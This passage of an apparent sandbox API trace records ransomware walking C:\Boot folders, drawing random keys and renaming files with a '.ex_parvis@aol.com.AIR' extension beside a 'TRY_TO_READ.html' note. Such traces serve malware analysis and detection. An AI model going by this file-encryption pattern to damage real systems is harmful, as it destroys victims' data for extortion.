lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.584] MoveFileExW (lpExistingFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.584] CreateFileW (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.584] GetProcessHeap () returned 0x2e0000 [0116.584] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.584] CloseHandle (hObject=0xffffffff) returned 0 [0116.584] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.584] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.584] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.584] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.584] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e148 | out: hHeap=0x2e0000) returned 1 [0116.584] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e170 | out: hHeap=0x2e0000) returned 1 [0116.584] FindFirstFileW (in: lpFileName="C:\\\\Boot\\el-GR\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x317e08 [0116.584] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.584] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.584] GetLastError () returned 0x6 [0116.585] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.585] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.585] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.585] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e148 [0116.585] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317e48 [0116.585] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317e48 | out: hHeap=0x2e0000) returned 1 [0116.585] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.585] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.585] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e148 | out: hHeap=0x2e0000) returned 1 [0116.585] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.585] FindNextFileW (in: hFindFile=0x317e08, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.585] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.585] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.585] GetLastError () returned 0x6 [0116.585] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.585] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.585] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.585] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e148 [0116.585] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317e48 [0116.585] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317e48 | out: hHeap=0x2e0000) returned 1 [0116.585] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.585] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.585] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e148 | out: hHeap=0x2e0000) returned 1 [0116.585] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.585] FindNextFileW (in: hFindFile=0x317e08, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.585] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.585] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.585] GetLastError () returned 0x6 [0116.585] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e148 [0116.585] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.585] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.585] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.585] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.585] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e148 | out: hHeap=0x2e0000) returned 1 [0116.586] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.586] FindNextFileW (in: hFindFile=0x317e08, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f95710, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.586] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.586] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.586] GetLastError () returned 0x6 [0116.586] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.586] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.586] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.586] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.586] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.586] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.586] FindNextFileW (in: hFindFile=0x317e08, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f95710, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.586] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.586] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x35b410 [0116.586] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a98 [0116.586] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x35b410 | out: pbBuffer=0x35b410) returned 1 [0116.586] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330a98 | out: pbBuffer=0x330a98) returned 1 [0116.586] SetFileAttributesW (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.586] lstrlenW (lpString="C:\\\\Boot\\el-GR\\bootmgr.exe.mui") returned 30 [0116.586] GetProcessHeap () returned 0x2e0000 [0116.586] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.586] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\el-GR\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\el-GR\\bootmgr.exe.mui") returned="C:\\\\Boot\\el-GR\\bootmgr.exe.mui" [0116.586] lstrcatW (in: lpString1="C:\\\\Boot\\el-GR\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.586] MoveFileExW (lpExistingFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.586] CreateFileW (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.586] GetProcessHeap () returned 0x2e0000 [0116.586] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.587] CloseHandle (hObject=0xffffffff) returned 0 [0116.587] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.587] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.587] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.587] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.587] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e198 | out: hHeap=0x2e0000) returned 1 [0116.587] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e1c0 | out: hHeap=0x2e0000) returned 1 [0116.587] FindFirstFileW (in: lpFileName="C:\\\\Boot\\en-US\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x317e48 [0116.587] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.587] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.587] GetLastError () returned 0x6 [0116.587] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.587] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.587] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.587] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e198 [0116.587] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317e88 [0116.587] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317e88 | out: hHeap=0x2e0000) returned 1 [0116.587] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.587] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.587] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e198 | out: hHeap=0x2e0000) returned 1 [0116.587] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.587] FindNextFileW (in: hFindFile=0x317e48, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.587] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.588] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.588] GetLastError () returned 0x6 [0116.588] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.588] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.588] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.588] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e198 [0116.588] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317e88 [0116.588] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317e88 | out: hHeap=0x2e0000) returned 1 [0116.588] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.588] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.588] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e198 | out: hHeap=0x2e0000) returned 1 [0116.588] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.588] FindNextFileW (in: hFindFile=0x317e48, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.588] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.588] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.588] GetLastError () returned 0x6 [0116.588] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e198 [0116.588] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.588] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.588] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.588] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.588] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e198 | out: hHeap=0x2e0000) returned 1 [0116.588] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.588] FindNextFileW (in: hFindFile=0x317e48, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0116.588] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.588] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.588] GetLastError () returned 0x6 [0116.588] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e198 [0116.588] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.588] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.588] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.588] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.588] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e198 | out: hHeap=0x2e0000) returned 1 [0116.588] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.588] FindNextFileW (in: hFindFile=0x317e48, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f95710, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.588] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.589] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.589] GetLastError () returned 0x6 [0116.589] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.589] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.589] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.589] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.589] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.589] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.589] FindNextFileW (in: hFindFile=0x317e48, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f95710, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.589] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.589] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x35c520 [0116.589] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330aa8 [0116.589] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x35c520 | out: pbBuffer=0x35c520) returned 1 [0116.589] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330aa8 | out: pbBuffer=0x330aa8) returned 1 [0116.589] SetFileAttributesW (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0116.589] lstrlenW (lpString="C:\\\\Boot\\en-US\\memtest.exe.mui") returned 30 [0116.589] GetProcessHeap () returned 0x2e0000 [0116.589] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.589] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\en-US\\memtest.exe.mui" | out: lpString1="C:\\\\Boot\\en-US\\memtest.exe.mui") returned="C:\\\\Boot\\en-US\\memtest.exe.mui" [0116.589] lstrcatW (in: lpString1="C:\\\\Boot\\en-US\\memtest.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\en-US\\memtest.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\en-US\\memtest.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.589] MoveFileExW (lpExistingFileName="C:\\\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\en-US\\memtest.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.589] CreateFileW (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.589] GetProcessHeap () returned 0x2e0000 [0116.589] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.589] CloseHandle (hObject=0xffffffff) returned 0 [0116.589] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.589] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.589] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.589] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x35c628 [0116.590] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330ab8 [0116.590] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x35c628 | out: pbBuffer=0x35c628) returned 1 [0116.590] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330ab8 | out: pbBuffer=0x330ab8) returned 1 [0116.590] SetFileAttributesW (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.590] lstrlenW (lpString="C:\\\\Boot\\en-US\\bootmgr.exe.mui") returned 30 [0116.590] GetProcessHeap () returned 0x2e0000 [0116.590] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.590] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\en-US\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\en-US\\bootmgr.exe.mui") returned="C:\\\\Boot\\en-US\\bootmgr.exe.mui" [0116.590] lstrcatW (in: lpString1="C:\\\\Boot\\en-US\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\en-US\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\en-US\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.590] MoveFileExW (lpExistingFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.590] CreateFileW (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.590] GetProcessHeap () returned 0x2e0000 